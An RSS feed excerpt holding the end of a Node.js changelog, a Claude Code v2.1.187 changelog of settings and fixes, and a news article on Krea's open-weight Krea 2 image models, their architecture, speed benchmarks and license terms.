<li>[<a href="https://github.com/nodejs/node/commit/c4058d0e05"><code>c4058d0e05</code></a>] - <strong>test</strong>: disable Maglev in near-heap-limit worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63398" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63398/hovercard">#63398</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/214da630a7"><code>214da630a7</code></a>] - <strong>test</strong>: deflake connection refused proxy tests (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63395" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63395/hovercard">#63395</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1d61a29876"><code>1d61a29876</code></a>] - <strong>test</strong>: avoid repeated writes in watch helper (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63386" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63386/hovercard">#63386</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2004e25387"><code>2004e25387</code></a>] - <strong>test</strong>: deflake watch mode worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63384" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63384/hovercard">#63384</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d691cccfc1"><code>d691cccfc1</code></a>] - <strong>test</strong>: relax test-memory-usage arrayBuffers check (inoway46) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0ff6bf853c"><code>0ff6bf853c</code></a>] - <strong>test</strong>: reduce flakiness of <code>different-registry-per-thread</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d9f4e8e503"><code>d9f4e8e503</code></a>] - <strong>test</strong>: fix flaky test-watch-mode-inspect timeout (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63361" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63361/hovercard">#63361</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d7cd50328"><code>6d7cd50328</code></a>] - <strong>test</strong>: relax min assertion in test-performance-eventloopdelay (Marco) <a href="https://github.com/nodejs/node/pull/63100" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63100/hovercard">#63100</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9dafe1d2d8"><code>9dafe1d2d8</code></a>] - <strong>test</strong>: avoid flaky restart sync in debugger exceptions test (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62055" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62055/hovercard">#62055</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/989b2de973"><code>989b2de973</code></a>] - <strong>test</strong>: avoid initial-break wait in restart-message (inoway46) <a href="https://github.com/nodejs/node/pull/62060" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62060/hovercard">#62060</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a072a25ee7"><code>a072a25ee7</code></a>] - <strong>test</strong>: move FFI tests to <code>NATIVE_SUITES</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63165" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63165/hovercard">#63165</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/64efbfd878"><code>64efbfd878</code></a>] - <strong>test</strong>: use ERM to destroy sqlite database handles after tests (René) <a href="https://github.com/nodejs/node/pull/63076" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63076/hovercard">#63076</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7dee66cd94"><code>7dee66cd94</code></a>] - <strong>test_runner</strong>: dont buffer unordered events in process isolation mode (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63432" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63432/hovercard">#63432</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d257eec1e3"><code>d257eec1e3</code></a>] - <strong>test_runner</strong>: fix --test-rerun-failures swallowing failures on retry (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63431" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63431/hovercard">#63431</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/288c320e2f"><code>288c320e2f</code></a>] - <strong>test_runner</strong>: show replayed-from-attempt hint in spec reporter (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/904bdf5bb4"><code>904bdf5bb4</code></a>] - <strong>test_runner</strong>: preserve run duration when using test-rerun (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/df183d7bfa"><code>df183d7bfa</code></a>] - <strong>test_runner</strong>: avoid hanging on incomplete v8 frames (Ali Hassan) <a href="https://github.com/nodejs/node/pull/62704" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62704/hovercard">#62704</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ec86c69726"><code>ec86c69726</code></a>] - <strong>test_runner</strong>: fix diagnostics channel context tracking (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63283" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63283/hovercard">#63283</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/94e5f63b83"><code>94e5f63b83</code></a>] - <strong>tls</strong>: add unsupported renegotiation error (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/06d308fb61"><code>06d308fb61</code></a>] - <strong>tools</strong>: prevent lib code from reading KeyObject and CryptoKey accessors (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2e4a0d0c91"><code>2e4a0d0c91</code></a>] - <strong>tools</strong>: bump brace-expansion from 5.0.5 to 5.0.6 in /tools/eslint (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63415" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63415/hovercard">#63415</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9666b366"><code>4c9666b366</code></a>] - <strong>tools</strong>: skip commit-lint on backport pull requests (Marco) <a href="https://github.com/nodejs/node/pull/63378" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63378/hovercard">#63378</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/67d0c490a8"><code>67d0c490a8</code></a>] - <strong>tools</strong>: fix skip of <code>test-internet</code> on forks (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63492" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63492/hovercard">#63492</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f73c7cac"><code>02f73c7cac</code></a>] - <strong>tools</strong>: bump the eslint group in /tools/eslint with 4 updates (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63075" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63075/hovercard">#63075</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5d016d3241"><code>5d016d3241</code></a>] - <strong>tools</strong>: update gyp-next to 0.22.2 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63374" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63374/hovercard">#63374</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/55af0f0edb"><code>55af0f0edb</code></a>] - <strong>tools</strong>: fix test426 updater (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63271" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63271/hovercard">#63271</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d8475e167a"><code>d8475e167a</code></a>] - <strong>tools</strong>: use different branch for tool updates on staging branches (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63110" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63110/hovercard">#63110</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c605df9e50"><code>c605df9e50</code></a>] - <strong>util</strong>: remove unused functions (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63612/hovercard">#63612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fe4540ebdb"><code>fe4540ebdb</code></a>] - <strong>util</strong>: create hex style cache and fast path (Guilherme Araújo) <a href="https://github.com/nodejs/node/pull/62999" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62999/hovercard">#62999</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.187]]></title>
<description><![CDATA[What's changed

Added sandbox.credentials setting to block sandboxed commands from reading credential files and secret environment variables
Added org-configured model restrictions to the model picker, --model, /model, and ANTHROPIC_MODEL, with a "restricted by your organization's settings" messa...]]></description>
<link>https://tsecurity.de/de/3619601/downloads/v21187/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619601/downloads/v21187/</guid>
<pubDate>Tue, 23 Jun 2026 23:16:43 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>sandbox.credentials</code> setting to block sandboxed commands from reading credential files and secret environment variables</li>
<li>Added org-configured model restrictions to the model picker, <code>--model</code>, <code>/model</code>, and <code>ANTHROPIC_MODEL</code>, with a "restricted by your organization's settings" message when a restricted model is selected</li>
<li>Added mouse click support to select menus (permission prompts, <code>/model</code>, <code>/config</code>, etc.) in fullscreen mode</li>
<li>Fixed <code>--resume</code> failing with "No conversation found" when the original <code>-p</code> run produced no model turns</li>
<li>Fixed <code>--json-schema</code> and workflow <code>agent({schema})</code> structured output: the model can no longer re-call <code>StructuredOutput</code> indefinitely after a successful call, and follow-up turns now reliably return structured output</li>
<li>Fixed remote MCP tool calls that hang with no response for 5 minutes — they now abort with an error instead of blocking indefinitely (override with <code>CLAUDE_CODE_MCP_TOOL_IDLE_TIMEOUT</code>)</li>
<li>Fixed Claude Code Remote sessions taking ~2.7s longer to start after the agent proxy CA system-trust install was added</li>
<li>Fixed pasted Korean/CJK text turning into mojibake in terminals that deliver paste as per-byte extended-key events</li>
<li>Fixed <code>/update</code> over Remote Control hanging when a startup trust dialog would have shown</li>
<li>Fixed background jobs in the agents view getting stuck in "working" indefinitely when the agent ended a turn without producing structured output</li>
<li>Fixed channel connections dropping after navigating to the agents view and back, and after <code>/bg</code>, <code>/tui</code>, or <code>/update</code></li>
<li>Fixed agent stop notifications not correctly attributing who stopped the agent, and improved wording ("finished"/"stopped" instead of "came to rest")</li>
<li>Fixed subagent depth tracking: resumed subagents now restore their original spawn depth, and forked subagents now count toward the depth cap</li>
<li>Fixed leaked agent worktree registrations: locked <code>.git/worktrees/</code> entries from killed agents are now cleaned up automatically</li>
<li>Fixed Cmd+click not opening URLs in fullscreen mode in Ghostty on macOS</li>
<li>Fixed <code>claude --help</code> not listing the <code>--bg</code>/<code>--background</code> flag</li>
<li>Fixed Esc, Ctrl-C, and Ctrl-D not working while <code>/share</code> is uploading</li>
<li>Improved <code>/install-github-app</code>: GitHub Actions workflow setup is now optional — you can install just the GitHub App and skip the workflow/secret steps</li>
<li>Improved <code>/btw</code> with ←/→ arrow navigation to step through earlier answers</li>
<li>Improved <code>/plugin</code> to surface plugins you haven't used recently so you can clean them up</li>
<li>[VSCode] Fixed extension becoming unresponsive when resuming a large session</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise-grade AI image generation in 2 seconds is here: Krea 2 Raw and Turbo available as open weights under custom license]]></title>
<description><![CDATA[While many enterprises have already begun integrating AI-generated images, visuals, graphics and videos into their production workflows — there is also a growing pool of data and subjective commentary indicating AI imagery ultimately looks non-distinct, monotonous, and too unoriginal to ensure a ...]]></description>
<link>https://tsecurity.de/de/3619526/it-nachrichten/enterprise-grade-ai-image-generation-in-2-seconds-is-here-krea-2-raw-and-turbo-available-as-open-weights-under-custom-license/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619526/it-nachrichten/enterprise-grade-ai-image-generation-in-2-seconds-is-here-krea-2-raw-and-turbo-available-as-open-weights-under-custom-license/</guid>
<pubDate>Tue, 23 Jun 2026 22:31:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>While many enterprises have already begun integrating AI-generated images, visuals, graphics and videos into their production workflows — there is also a<a href="https://gizmodo.com/ai-image-generators-default-to-the-same-12-photo-styles-study-finds-2000702012"> growing pool of data</a> and subjective commentary indicating AI imagery ultimately looks non-distinct, monotonous, and too unoriginal to ensure a brand and its assets stand out from the pack. That it's "AI slop," in other words. </p><p>AI creative tools startup Krea is hoping to change that trend by<a href="https://x.com/krea_ai/status/2069435590995812396"> opening up the weights</a> to its new frontier AI image model Krea 2 as two versions, "<a href="https://huggingface.co/krea/Krea-2-Raw">Krea 2 Raw</a>" and "<a href="https://huggingface.co/krea/Krea-2-Turbo">Krea 2 Turbo</a>," under a <a href="https://huggingface.co/krea/Krea-2-Raw/blob/main/LICENSE.pdf">custom license </a>that requires firms with more than 50 seats to pay for Enterprise usage, and mandates all users of any size to implement technical safeguards to <!-- -->prevent the generation of illegal materials, non-consensual intimate imagery (NCII), child sexual abuse material (CSAM), or defamatory assets.</p><p>Both models are available for public download on <a href="https://huggingface.co/krea">Hugging Face</a>. The company says the models provide more visual variety than typical AI generators, while maintaining high prompt accuracy, fidelity, and quality. Importantly, they also offer enterprises and users the ability to customize the generative outputs much more than typical proprietary or even other open source models. </p><p>And, for those seeking to generate imagery at high-throughput, <a href="https://www.krea.ai/blog/krea-2-turbo">Krea 2 Turbo's generation speed is only 2 seconds</a>, making it among the fastest now available across open and proprietary AI image generation models.</p><h2><b>AI Image Generator API Speed &amp; Licensing Benchmarks (Mid-2026)</b></h2><table><tbody><tr><td><p><b>Model / Generator</b></p></td><td><p><b>Developer / Platform</b></p></td><td><p><b>Avg. Generation Time</b></p></td><td><p><b>Licensing &amp; Commercial Use</b></p></td><td><p><b>Key Characteristics</b></p></td></tr><tr><td><p>FLUX.1 [schnell] (fast)</p></td><td><p>Prodia</p></td><td><p>0.5 seconds</p></td><td><p>Open Weights (Apache 2.0).</p><p> Fully permissive for free commercial use.</p></td><td><p>Highly optimized endpoint utilizing step distillation to deliver sub-second generation times, representing the absolute floor for current API latency.</p></td></tr><tr><td><p>Z-Image Turbo</p></td><td><p>Replicate / fal.ai</p></td><td><p>1.8 seconds</p></td><td><p>Proprietary.</p><p> Commercial rights require active API usage contracts.</p></td><td><p>Designed for instantaneous inference bursts. Both Replicate and fal.ai achieve identical 1.8-second median times on this model.</p></td></tr><tr><td><p><b>Krea 2 Turbo</b></p></td><td><p><b>Krea</b></p></td><td><p><b>2.0 seconds</b></p></td><td><p><b>Open Weights / Proprietary Hybrid.</b></p><p><b> Available via platform trial or API.</b></p></td><td><p><b>Maintains the base model's compatibility with style references and LoRAs while utilizing Trajectory Distribution Matching (TDM) to accelerate the creative ideation loop.</b></p></td></tr><tr><td><p>Midjourney v8.1 (Turbo Mode)</p></td><td><p>Midjourney</p></td><td><p>3 – 6 seconds </p></td><td><p>Proprietary. Commercial use requires an active Standard, Pro, or Mega tier subscription. </p></td><td><p>Delivers generation speeds "three times faster than v8" while maintaining the model's signature "painterly realism with sophisticated lighting," though it requires a "higher credit cost". </p></td></tr><tr><td><p>FLUX.2 [klein] 4B</p></td><td><p>Black Forest Labs</p></td><td><p>3.9 seconds</p></td><td><p>Open Weights.</p><p> Permissive commercial use.</p></td><td><p>The lightweight 4-billion parameter variant of the FLUX.2 architecture, balancing prompt adherence with high-speed generation.</p></td></tr><tr><td><p>FLUX.2 [klein] 9B</p></td><td><p>Black Forest Labs</p></td><td><p>4.6 seconds</p></td><td><p>Open Weights.</p><p> Permissive commercial use.</p></td><td><p>The medium-weight 9-billion parameter open model. It scales up compositional intelligence while keeping generation firmly under the 5-second barrier.</p></td></tr><tr><td><p>MAI Image 2 Efficient</p></td><td><p>Microsoft</p></td><td><p>4 – 7 seconds </p></td><td><p>Proprietary. Commercial use requires consumption-based API billing via Azure AI Foundry. </p></td><td><p>A throughput-optimized variant explicitly designed to "out-pace Google’s Imagen Flash". It makes a slight trade-off in detail for "substantially lower latency" that suits "automated pipelines" perfectly. </p></td></tr><tr><td><p>Midjourney v8.1 (Fast Mode)</p></td><td><p>Midjourney</p></td><td><p>5 – 9 seconds </p></td><td><p>Proprietary. Commercial use requires an active Standard, Pro, or Mega tier subscription. </p></td><td><p>The standard operational mode for v8.1. Average wait times "consistently lands below 10 seconds for most prompts" while offering "excellent handling of complex multi-element scenes". </p></td></tr><tr><td><p>FLUX.2 [dev]</p></td><td><p>fal.ai / DeepInfra</p></td><td><p>6.1 – 6.4 seconds</p></td><td><p>Open Weights (Non-Commercial).</p><p> Strictly for research and non-commercial development.</p></td><td><p>The developer-focused research model. API endpoint optimizations cause slight variance, with fal.ai operating at 6.1 seconds and DeepInfra at 6.4 seconds.</p></td></tr><tr><td><p>Midjourney v8.1 (Relax Mode)</p></td><td><p>Midjourney</p></td><td><p>8 – 14 seconds </p></td><td><p>Proprietary. Commercial use requires an active Standard, Pro, or Mega tier subscription. </p></td><td><p>Processes standard 1024x1024 resolution images without consuming fast GPU hours. The model retains "strong compositional instincts" and "consistent color grading and mood". </p></td></tr><tr><td><p>FLUX.2 [pro]</p></td><td><p>Black Forest Labs</p></td><td><p>11.1 seconds</p></td><td><p>Proprietary.</p><p> Commercial rights require paid API consumption.</p></td><td><p>The closed, professional-grade tier. It drops extreme step-distillation to prioritize high-fidelity commercial rendering and strict spatial alignments.</p></td></tr><tr><td><p>Seedream 4.0</p></td><td><p>BytePlus</p></td><td><p>11.6 seconds</p></td><td><p>Proprietary.</p><p> Commercial use via BytePlus enterprise contracts.</p></td><td><p>The base commercial generation model for the Seedream architecture, focused on reliable, standard-resolution outputs.</p></td></tr><tr><td><p>MAI Image 2 Standard</p></td><td><p>Microsoft</p></td><td><p>12 – 20 seconds </p></td><td><p>Proprietary. Commercial use requires consumption-based API billing via Azure AI Foundry. </p></td><td><p>Operates as a "full-quality output optimized for photorealism". It acts as a literal renderer, delivering "high-fidelity skin tones and material textures" and "strong literal prompt adherence". </p></td></tr><tr><td><p>Nano Banana Pro (Gemini 3 Pro Image)</p></td><td><p>Google DeepMind</p></td><td><p>17.7 seconds</p></td><td><p>Proprietary.</p><p> Commercial rights granted via Gemini API terms.</p></td><td><p>Prioritizes exact semantic accuracy and prompt adherence through an extended reasoning phase, trading raw speed for complex contextual execution.</p></td></tr><tr><td><p>Seedream 4.5</p></td><td><p>BytePlus</p></td><td><p>18.2 seconds</p></td><td><p>Proprietary.</p><p> Commercial use via BytePlus enterprise contracts.</p></td><td><p>The upgraded high-fidelity variant, requiring an additional 6.6 seconds of compute time over the 4.0 version to refine complex textures and text rendering.</p></td></tr><tr><td><p>Krea 2 Large</p></td><td><p>Krea</p></td><td><p>23.7 seconds</p></td><td><p>Proprietary / Open Weights.</p><p> Commercial rights depend on deployment.</p></td><td><p>The un-distilled foundation model. It ignores the speed-focused Trajectory Distribution Matching of the Turbo variant to maximize aesthetic polish and structural stability.</p></td></tr><tr><td><p>FLUX.2 [max]</p></td><td><p>Black Forest Labs</p></td><td><p>25.6 seconds</p></td><td><p>Proprietary.</p><p> Closed enterprise API.</p></td><td><p>The heaviest parameter model in the FLUX lineup. It operates exclusively as a deep reasoning renderer for complex commercial assets.</p></td></tr><tr><td><p>GPT-Image-2</p></td><td><p>OpenAI</p></td><td><p>200.8 seconds</p></td><td><p>Proprietary.</p><p> Full commercial usage under standard OpenAI terms.</p></td><td><p>A massive outlier in the latency landscape. It dedicates over three minutes to complex, multi-step semantic reasoning, likely utilizing an expansive chain-of-thought process prior to finalizing pixel outputs.</p></td></tr></tbody></table><p><i>Sources: </i><a href="https://artificialanalysis.ai/image/models"><i>Artificial Analysis</i></a><i>, </i><a href="https://www.krea.ai/blog/krea-2-turbo"><i>Krea</i></a><i>, </i><a href="https://www.mindstudio.ai/blog/midjourney-v8-1-vs-microsoft-mai-image-2"><i>MindStudio.AI</i></a><i></i></p><h2><b>Architectural bifurcation and the 12B parameter Transformer</b></h2><p>At the <a href="https://www.krea.ai/blog/krea-2-technical-report">technical core</a> of the release sits an architectural framework built entirely from scratch: a Diffusion Transformer scaled to 12 billion parameters. </p><p>Rather than deploying a single, heavily fine-tuned model for all downstream tasks, Krea open-sources two highly differentiated checkpoints captured at distinct milestones of the model's training lifecycle.</p><p>Departing from multi-stream configurations for structural clarity, the core engine standardizes on a single-stream transformer block architecture wherein attention and MLP layers are shared natively between text and image tokens. </p><p>To maximize computational efficiency, Krea incorporates a SwiGLU MLP layer operating at a 4x expansion factor alongside Grouped-Query Attention (GQA) combined with gated sigmoid attention layers to stabilize training dynamics. </p><p>Timestep conditioning is heavily optimized; the network replaces traditional per-block MLP modules with a lightweight, per-block tunable bias term, successfully cutting total block modulation parameters by 20% to 30% and reallocating that parameter budget directly into core layers. </p><p>Positional encoding is managed via a 3D Axial Rotary Position Embedding (RoPE) scheme mapping across individual frame, height, and width coordinate</p><p><b>Krea 2 Raw </b>represents an undistilled base release checkpoint taken directly from the mid-training stage of the larger Krea 2 Medium development cycle. </p><p>Because it lacks post-training alignment, reinforcement learning from human feedback (RLHF), or final aesthetic distillation, Krea 2 Raw functions as a blank canvas. </p><p>It retains a vast, uncurated latent space that makes it poorly suited for immediate out-of-the-box prompting, but highly optimized for structural training. </p><p>Operating this model via the Hugging Face `diffusers` library requires a heavy compute footprint, executing via `Krea2Pipeline` in `torch.bfloat16` precision across 52 inference steps with a guidance scale of 3.5.</p><p>To accelerate early-stage architectural convergence during the first epoch of this 256px baseline training phase, Krea applied internal Representation Alignment (iREPA) techniques before decoupling them to let the underlying model develop independent structural representations.</p><p>The second checkpoint, <b>Krea 2 Turbo,</b> represents the opposite end of the optimization spectrum. </p><p>It is a distilled, post-trained variant derived from Krea 2 Medium. Through knowledge distillation, the network's complex multi-step generation sequence is compressed into an incredibly lean operational profile. </p><p>Krea 2 Turbo slashes the required generation cycle down to just 8 inference steps with a guidance scale of 0.0, enabling it to render native 2k resolution imagery on standard consumer-grade hardware in <b>approximately 2 seconds.</b></p><p>The underlying latent representations for both models are optimized through the integration of the Qwen Image VAE and the FLUX 2 VAE to guarantee rapid convergence while maintaining high reconstruction fidelity.</p><h2><b>Data and training</b></h2><p>The underlying dataset strategy for the Krea 2 family relies on a hybrid blend of publicly harvested data, third-party licensed image repositories, and highly curated synthetic datasets built via proprietary generation methods. </p><p>Prior to final training, Krea processed these collections through rigorous algorithmic filters designed to strip out duplicative frames, low-resolution media, and explicit or harmful material, ensuring high fidelity and strong prompt compliance across both models.</p><p>Krea enforces a <i>zero-synthetic data policy</i> within its primary pretraining mix. </p><p>To prevent the upper-bound quality limitations and output biases induced by AI-generated data, the engineering team deployed custom in-house filtering classifiers built on top of DINOv3 and SigLIP-2 architectures to completely purge synthetic images at scale. </p><p>Furthermore, rather than using traditional model-based aesthetic filters that inadvertently strip away artistic intents like motion blur, Krea preserves wide stylistic boundaries. </p><p>The team trained a Sparse Autoencoder (SAE) on SigLIP-2 embeddings to isolate and filter out genuine visual artifacts using an unsupervised tagging framework. </p><h2><b>Krea 2 Raw vs. Krea 2 Turbo: Distinctions and use cases</b></h2><p>The release establishes a highly deliberate operational paradigm for professional studios and independent creators: "train on Raw, generate with Turbo." This workflow leverages the unique architectural properties of both open-weight files to optimize both training accuracy and rendering speed.</p><p>In creative production pipelines, engineers can use Krea 2 Raw to train custom Low-Rank Adaptations (LoRAs) or domain-specific fine-tunes. </p><p>Because the Raw checkpoint contains no baked-in stylistic opinions or aggressive post-training constraints, it absorbs unique aesthetic directions—such as architectural drafting styles, specific brand assets, or complex lighting designs—with high fidelity and zero stylistic interference. </p><p>Once the training phase is complete, creators can port those exact LoRAs directly over to Krea 2 Turbo.</p><p>This methodology is reflected in Krea's own development ecosystem, which hosts an in-house collection of custom LoRAs trained entirely on the Raw foundation model but optimized for execution within Turbo workflows. </p><p>On the user-facing application layer, Krea integrates this dual-engine setup with a powerful style transfer system. Rather than relying on erratic text descriptions to achieve an artistic look, users can feed multiple style reference images directly into the system. </p><p>Krea 2 maps these references across its latent space, allowing creators to isolate individual aesthetic components, combine distinct moodboards, adjust style strength via generative sliders, and fine-tune batch variation levels to maintain visual cohesion across large-scale design iterations.</p><p>To address the gap between raw textual training captions and brief user inputs, Krea paired this suite with an advanced LLM Prompt Expander. Refined via Generalized Deep Q-Network Preference Optimization (GDPO) and trained on synthetic thinking traces to preserve intent reconstruction, the expander applies a photographic-medium bias to photorealistic requests and integrates an active DINOv3 embedding diversity score across rollout groups to prevent automated prompting routines from collapsing into a singular house style.</p><p>While Krea 2 Medium and Krea 2 Large remain the company's flagship models for high-fidelity composition and absolute stylistic adherence, Turbo fills the critical role of rapid visual ideation. </p><p>It serves as an interactive scratchpad for early concept creation, quick prompt experimentation, and iterative art direction where near-instantaneous feedback loops are required to maintain creative momentum.</p><h2><b>The custom license and its particulars</b></h2><p>The open-weight assets deploy under the <a href="https://huggingface.co/krea/Krea-2-Raw/blob/main/LICENSE.pdf">Krea 2 Community License Agreemen</a>t operating alongside an official Acceptable Use Policy. </p><p>At a macro level, this legal framework mirrors recent industry trends toward commercial-use permissions that target small businesses while restricting large enterprise exploitation. </p><p>The license explicitly permits individuals, independent creators, and <i>small</i> commercial companies to build applications, monetize generated imagery, and integrate the open weights directly into commercial software products without royalty obligations. </p><p>Furthermore, Krea states that it "does not claim copyright or other intellectual property rights over content generated by users of this model," leaving output ownership entirely in the hands of the operator.</p><p>For organizations scaling beyond this baseline, the ecosystem shifts into a paid, custom-tier structure. </p><p>While Krea's official documentation lacks a rigid revenue threshold defining a "large enterprise," the company structurally demarcates the boundary based on organizational footprint: standard commercial usage caps at a "Business" tier accommodating up to 50 seats. </p><p>Therefore, any entity requiring more than 50 seats, Single Sign-On (SSO) integrations, guaranteed Service Level Agreements (SLAs), or custom Data Processing Agreements (DPAs) qualifies as an Enterprise. </p><p>These larger entities fall outside the free Community License scope and must pay for a custom commercial license—operating under "Custom Terms of Service"—negotiated directly with Krea's sales team. </p><p>Additionally, developer access to Krea's official API remains entirely decoupled from the open-weights release; API usage operates as a distinct, paid service billed dynamically on a per-generation basis (measured in microdollars) and requires a prepaid USD balance independent of standard monthly compute subscriptions.</p><p>However, a close examination reveals a significant structural shift regarding legal and behavioral compliance for all self-hosted deployments. </p><p>Unlike traditional open-source permissions like the MIT or Apache 2.0 licenses—which grant unconditional usage rights and completely waive liability—the Krea 2 Community License implements strict downstream behavioral guardrails.</p><p>Because Krea relinquishes centralized control over the downstream deployment of its open weights, the contract legally binds deployers to enforce content moderation protocols at the infrastructure layer. </p><p>Under the terms of the agreement, any developer or platform hosting Krea 2 models must implement active input/output classifiers or equivalent content filtering mechanisms to actively prevent the generation of illegal materials, non-consensual intimate imagery (NCII), child sexual abuse material (CSAM), or defamatory assets. </p><p>Developers who fail to deploy these defensive safety layers stand in immediate breach of contract, giving Krea the explicit right to update model weights or revoke access to the model family entirely.</p><h2><b>Background on Krea</b></h2><p>Founded in 2022 by audiovisual systems engineering dropouts Víctor Perez and Diego Rodriguez Prado, San Francisco-based Krea initially captured market traction as a highly fluid user interface layer built to orchestrate disparate, third-party AI generative engines. </p><p>The startup's rapid scaling via product-led adoption culminated in an aggregate<a href="https://techcrunch.com/2025/04/07/kreas-founders-snubbed-postgrad-grants-from-the-king-of-spain-to-build-their-ai-startup-now-its-valued-at-500m/"> $83 million </a>in disclosed venture capital funding from major VCs including Andreessen Horowitz and Bain Capital Ventures, as well as early-stage institutional backers including Pebblebed, Abstract Ventures, and Gradient Ventures.</p><p>The company's user base surpassed <a href="https://www.krea.ai/">30 million individuals across 191 countries as of June 2026</a>, according to its website. </p><p>The open-weights launch of the Krea 2 model family represents the culmination of Krea’s deliberate evolution from a multi-model SaaS aggregator into a self-sustaining media research lab. </p><p>Early in its lifecycle, Krea focused on building workflow tools, editing systems, and a node-based automation pipeline that allowed digital artists to unify models from competitors like Runway, Midjourney, and Adobe under a single subscription. </p><p>However, to insulate itself against upstream platform dependencies and supplier margin pressures, the company aggressively shifted toward developing proprietary architectures. This transition began taking public shape in July 2025 with the open-weights release of the custom-curated FLUX.1 Krea checkpoint, followed in October 2025 by Krea Realtime 14B—an autoregressive video model distilled from Wan 2.1 capable of rendering 11 frames per second on localized enterprise hardware.</p><p>This underlying technical maturation parallels Krea's accelerating push into high-end enterprise workflows. Large-scale creative production operations have shifted toward treating Krea as core creative infrastructure; for example, the digital creative services platform </p><p><a href="https://www.youtube.com/watch?v=OLNbn4L2fUM">Superside reported migrating workflows</a> from fragmented open-source setups to route roughly 80 percent of its total AI generative production through Krea. </p><p>Furthermore, Krea established a strategic co-development partnership with Copenhagen-headquartered architecture firm <a href="https://henninglarsen.com/news/we-re-partnering-with-krea">Henning Larsen</a> to build highly restricted, domain-specific design tools tuned to meet the compliance frameworks mandated by the 